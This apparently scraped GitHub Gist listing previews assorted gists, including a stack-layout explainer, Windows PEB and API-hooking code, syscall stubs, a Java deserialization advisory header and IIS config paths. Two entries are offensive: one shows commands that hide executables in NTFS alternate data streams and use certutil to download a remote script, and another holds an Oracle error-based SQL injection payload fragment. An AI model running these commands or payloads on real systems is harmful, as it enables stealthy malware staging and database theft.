@cpq
cpq / Stack.md
Last active January 14, 2025 15:58
Why stack grows down

Why stack grows down

Any running process has several memory regions: code, read-only data, read-write data, et cetera. Some regions, such as code and read-only data, are static and do not change over time. Other regions are dynamic: they can expand and shrink. Usually there are two such regions: a dynamic read-write data region, called the heap, and a region called the stack. The heap holds dynamic memory allocations, and the stack is mostly used for keeping function frames.

Both the stack and the heap can grow. An OS doesn't know in advance whether the stack or the heap will be used predominantly. Therefore, an OS must lay out these two memory regions in a way that guarantees maximum space for both. And here is the solution:

  1. Lay out static memory regions at the edges of the process's virtual memory
  2. Put the heap and the stack on the edges too, and let them grow towards each other: one grows up, one grows down
@tsiege
tsiege / The Technical Interview Cheat Sheet.md
Last active March 1, 2025 00:22
This is my technical interview cheat sheet. Feel free to fork it or do whatever you want with it. PLEASE let me know if there are any errors or if anything crucial is missing. I will add more links soon.

ANNOUNCEMENT

I have moved this over to the Tech Interview Cheat Sheet Repo, and it has been expanded and even has code challenges you can run and practice against!
@Spl3en
Spl3en / ModulesFromPeb.c
Created May 9, 2015 10:09
Get current process modules from PEB
#include <windows.h>
#include <subauth.h>
#include <stdio.h>
/* Windows structures */
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
@frohoff
frohoff / JAVA-ADVISORY.md
Last active August 28, 2023 19:08
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: [email protected]
  • Vulnerability Type: Unsafe Object Deserialization
@NaxAlpha
NaxAlpha / HookFx.cs
Last active October 24, 2024 12:53
Windows API Hook with C#
using System;
using System.Runtime.InteropServices;
public class FxHook:IDisposable {
const int nBytes = 5;
IntPtr addr;
Protection old;
byte[] src = new byte[5];
@wbenny
wbenny / nt_syscalls.md
Last active September 16, 2024 22:11
Windows syscall stubs

Windows system calls

...by stub

x86

Windows XP

B8 ?? ?? ?? ??                mov     eax, ??
BA 00 03 FE 7F                mov     edx, 7FFE0300h
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active February 25, 2025 08:33
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@xassiz
xassiz / oracle_error-based_xmltype.sql
Created April 17, 2018 18:29
Optimized Oracle error-based SQL injection technique via xmltype() + base64
/*
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
*/
select ''||
xmltype('<'||
regexp_replace(
utl_raw.cast_to_varchar2(
utl_encode.base64_encode(
@NaniteFactory
NaniteFactory / dllmain.go
Last active February 21, 2025 23:33
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
package main
//#include "dllmain.h"
import "C"
@jonlabelle
jonlabelle / iis_config_file_paths.md
Created March 21, 2019 15:49
IIS Config File Paths

IIS Config File Paths

Internet Information Services (IIS) 7 and later use an XML-based configuration system for storing IIS settings, which replaces the metabase that was used in IIS 6.0 and earlier. This new configuration system was introduced with ASP.NET and is based on a hierarchical management system that uses *.config files. The configuration files for IIS 7 and later are located in the %windir%\System32\inetsrv\config folder.

applicationHost.config